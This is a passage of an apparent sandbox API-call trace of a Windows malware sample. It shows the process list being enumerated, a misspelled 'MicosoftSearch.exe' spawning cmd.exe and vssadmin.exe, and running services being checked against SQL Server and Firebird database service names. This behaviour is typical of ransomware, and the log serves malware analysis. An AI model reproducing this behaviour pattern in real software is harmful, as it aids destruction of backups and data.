lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0042.946] lstrlenW (lpString="lsass.exe") returned 9 [0042.946] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0042.947] lstrlenW (lpString="lsm.exe") returned 7 [0042.947] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.947] lstrlenW (lpString="svchost.exe") returned 11 [0042.947] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.948] lstrlenW (lpString="svchost.exe") returned 11 [0042.948] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.949] lstrlenW (lpString="svchost.exe") returned 11 [0042.949] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.950] lstrlenW (lpString="svchost.exe") returned 11 [0042.950] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.950] lstrlenW (lpString="svchost.exe") returned 11 [0042.950] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0042.951] lstrlenW (lpString="audiodg.exe") returned 11 [0042.951] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.952] lstrlenW (lpString="svchost.exe") returned 11 [0042.952] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.953] lstrlenW (lpString="svchost.exe") returned 11 [0042.953] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0042.953] lstrlenW (lpString="dwm.exe") returned 7 [0042.953] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0042.954] lstrlenW (lpString="explorer.exe") returned 12 [0042.954] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0042.955] lstrlenW (lpString="spoolsv.exe") returned 11 [0042.955] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0042.956] lstrlenW (lpString="taskhost.exe") returned 12 [0042.956] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.956] lstrlenW (lpString="svchost.exe") returned 11 [0042.956] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0042.957] lstrlenW (lpString="taskeng.exe") returned 11 [0042.957] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0042.958] lstrlenW (lpString="taskhost.exe") returned 12 [0042.958] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0042.959] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0042.959] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0042.959] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0042.959] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0042.960] lstrlenW (lpString="sa_shape.exe") returned 12 [0042.960] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0042.961] lstrlenW (lpString="confidence.exe") returned 14 [0042.961] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0042.962] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0042.962] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0042.962] lstrlenW (lpString="blue.exe") returned 8 [0042.962] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0042.963] lstrlenW (lpString="newly debut.exe") returned 15 [0042.963] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0043.354] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0043.354] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0043.355] lstrlenW (lpString="archive.exe") returned 11 [0043.355] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0043.356] lstrlenW (lpString="defend.exe") returned 10 [0043.356] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0043.357] lstrlenW (lpString="arservice.exe") returned 13 [0043.357] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0043.361] lstrlenW (lpString="rr-programmer.exe") returned 17 [0043.361] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0043.361] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0043.361] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0043.362] lstrlenW (lpString="twistedmonton.exe") returned 17 [0043.362] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0043.363] lstrlenW (lpString="arc plains.exe") returned 14 [0043.363] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0043.364] lstrlenW (lpString="americahousestip.exe") returned 20 [0043.364] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0043.364] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0043.364] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0043.365] lstrlenW (lpString="medical lectures.exe") returned 20 [0043.365] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0043.366] lstrlenW (lpString="electronic.exe") returned 14 [0043.366] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0043.367] lstrlenW (lpString="regression.exe") returned 14 [0043.367] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0043.367] lstrlenW (lpString="county.exe") returned 10 [0043.367] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0043.368] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0043.368] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0043.369] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0043.369] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0043.370] lstrlenW (lpString="cmd.exe") returned 7 [0043.370] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0043.371] lstrlenW (lpString="conhost.exe") returned 11 [0043.371] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0043.371] lstrlenW (lpString="vssadmin.exe") returned 12 [0043.371] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0043.372] lstrlenW (lpString="VSSVC.exe") returned 9 [0043.372] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.373] lstrlenW (lpString="svchost.exe") returned 11 [0043.373] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0043.374] CloseHandle (hObject=0x1f8) returned 1 [0043.374] Sleep (dwMilliseconds=0x1f4) [0044.213] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232e28 [0044.213] EnumServicesStatusExW (in: hSCManager=0x4232e28, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0044.214] GetLastError () returned 0xea [0044.214] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xba5bf8 [0044.214] EnumServicesStatusExW (in: hSCManager=0x4232e28, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xba5bf8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xba5bf8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0044.215] CloseServiceHandle (hSCObject=0x4232e28) returned 1 [0044.215] lstrlenW (lpString="Appinfo") returned 7 [0044.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0044.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0044.215] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0044.215] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0044.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0044.215] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0044.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.215] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0044.215] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0044.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0044.215] lstrlenW (lpString="AudioSrv") returned 8 [0044.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0044.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0044.215] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0044.215] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0044.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0044.216] lstrlenW (lpString="BFE") returned 3 [0044.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0044.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0044.216] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0044.216] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0044.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0044.216] lstrlenW (lpString="CryptSvc") returned 8 [0044.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0044.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0044.216] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0044.216] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0044.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0044.216] lstrlenW (lpString="CscService") returned 10 [0044.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0044.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0044.216] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0044.216] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0044.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0044.216] lstrlenW (lpString="DcomLaunch") returned 10 [0044.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.216] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0044.216] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0044.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0044.216] lstrlenW (lpString="Dhcp") returned 4 [0044.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0044.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0044.216] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0044.216] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0044.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0044.216] lstrlenW (lpString="Dnscache") returned 8 [0044.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0044.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0044.217] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0044.217] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0044.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0044.217] lstrlenW (lpString="DPS") returned 3 [0044.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0044.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0044.217] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0044.217] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0044.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0044.217] lstrlenW (lpString="eventlog") returned 8 [0044.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0044.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0044.217] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0044.217] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0044.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0044.217] lstrlenW (lpString="EventSystem") returned 11 [0044.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0044.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0044.217] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0044.217] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0044.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0044.217] lstrlenW (lpString="gpsvc") returned 5 [0044.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0044.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0044.217] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0044.217] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0044.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0044.217] lstrlenW (lpString="iphlpsvc") returned 8 [0044.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.217] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0044.217] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0044.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0044.217] lstrlenW (lpString="LanmanServer") returned 12 [0044.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0044.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0044.218] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0044.218] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0044.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0044.218] lstrlenW (lpString="LanmanWorkstation") returned 17 [0044.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.218] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0044.218] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0044.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0044.218] lstrlenW (lpString="lmhosts") returned 7 [0044.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0044.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0044.218] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0044.218] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0044.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0044.218] lstrlenW (lpString="MMCSS") returned 5 [0044.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0044.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0044.218] 